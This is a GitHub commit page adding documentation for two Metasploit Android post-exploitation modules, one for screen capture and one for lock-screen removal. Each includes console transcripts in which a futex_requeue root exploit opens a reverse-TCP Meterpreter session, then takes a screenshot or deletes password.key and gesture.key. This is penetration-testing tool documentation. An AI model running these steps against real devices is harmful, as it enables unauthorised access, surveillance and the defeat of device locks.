Skip to content
Permalink
Browse files

Land #12495, add Android module docs

  • Loading branch information
busterb committed Nov 6, 2019
2 parents f4cea61 + 740687c commit e9b36520c5e4b39f9ce864f3204a4be6b2c024cc
@@ -0,0 +1,58 @@
## Description

This module takes a screen capture with the Android built-in application to live off the land.
`shell` or `root` access is required.

## Verification Steps

1. Start msfconsole
2. Get `shell` or `root` access on an Android device
3. Do: ```use post/android/capture/screen```
4. Do: ```set session [session]```
5. Do: ```run```
6. You should get a screen capture saved to your device.

## Options

**EXE_PATH**

Path to the `screencap` executable on Android device. Default is `/system/bin/screencap`.

**TMP_PATH**

Path to temp directory on Android device to save the screenshot to temporarily. Default is `/data/local/tmp/`.

## Scenarios

### Samsung Galaxy S3 Verizon (SCH-I535 w/ Android 4.4.2, kernel 3.4.0)

Utilizing futex_requeue to get root access.

```
msf5 exploit(android/local/futex_requeue) > run
[*] Started reverse TCP handler on 111.111.1.111:4444
[*] Using target: New Samsung
[*] Loading exploit library /data/data/com.metasploit.stage/files/cbvzt
[*] Loaded library /data/data/com.metasploit.stage/files/cbvzt, deleting
[*] Waiting 300 seconds for payload
[*] Sending stage (904600 bytes) to 222.222.2.222
[*] Meterpreter session 4 opened (111.111.1.111:4444 -> 222.222.2.222:58577) at 2019-10-22 16:04:31 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(android/local/futex_requeue) > use post/android/capture/screen
msf5 post(android/capture/screen) > set session 4
session => 4
msf5 post(android/capture/screen) > run
[!] SESSION may not be compatible with this module.
[+] Downloading screenshot...
[+] Screenshot saved at /root/.msf4/loot/20191022161242_default_222.222.2.222_screen_capture.s_496457.png
[*] Post module execution completed
```

![20191022161242_default_192 168 2 14_screen_capture s_496457](https://user-images.githubusercontent.com/752491/67612706-d433ae80-f772-11e9-8344-30020515299e.png)

@@ -0,0 +1,51 @@
## Description

This module removes the screen lock data files to remove the unlock mechanism. If the device
still has a lock, the password will be blank.

The file which are removed:

* /data/system/password.key
* /data/system/gesture.key

## Verification Steps

1. Start msfconsole
2. Get `shell` or `root` access on an Android device
3. Do: ```use post/android/manage/remove_lock_root```
4. Do: ```set session [session]```
5. Do: ```run```
6. You should be able to unlock the device without a password or gesture.

## Scenarios

### Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)

Utilizing futex_requeue to get root access.

```
msf5 exploit(android/local/futex_requeue) > run
[*] Started reverse TCP handler on 111.111.1.111:4444
[*] Using target: New Samsung
[*] Loading exploit library /data/data/com.metasploit.stage/files/cbvzt
[*] Loaded library /data/data/com.metasploit.stage/files/cbvzt, deleting
[*] Waiting 300 seconds for payload
[*] Sending stage (904600 bytes) to 222.222.2.222
[*] Meterpreter session 4 opened (111.111.1.111:4444 -> 222.222.2.222:58577) at 2019-10-22 16:04:31 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(android/local/futex_requeue) > use post/android/manage/remove_lock_root
msf5 post(android/manage/remove_lock_root) > set session 4
session => 4
msf5 post(android/manage/remove_lock_root) > run
[!] SESSION may not be compatible with this module.
[*] Removing /data/system/password.key
[*] Removing /data/system/gesture.key
[*] Device should be unlocked or no longer require a pin
[*] Post module execution completed
```

0 comments on commit e9b3652

Please sign in to comment.
You can’t perform that action at this time.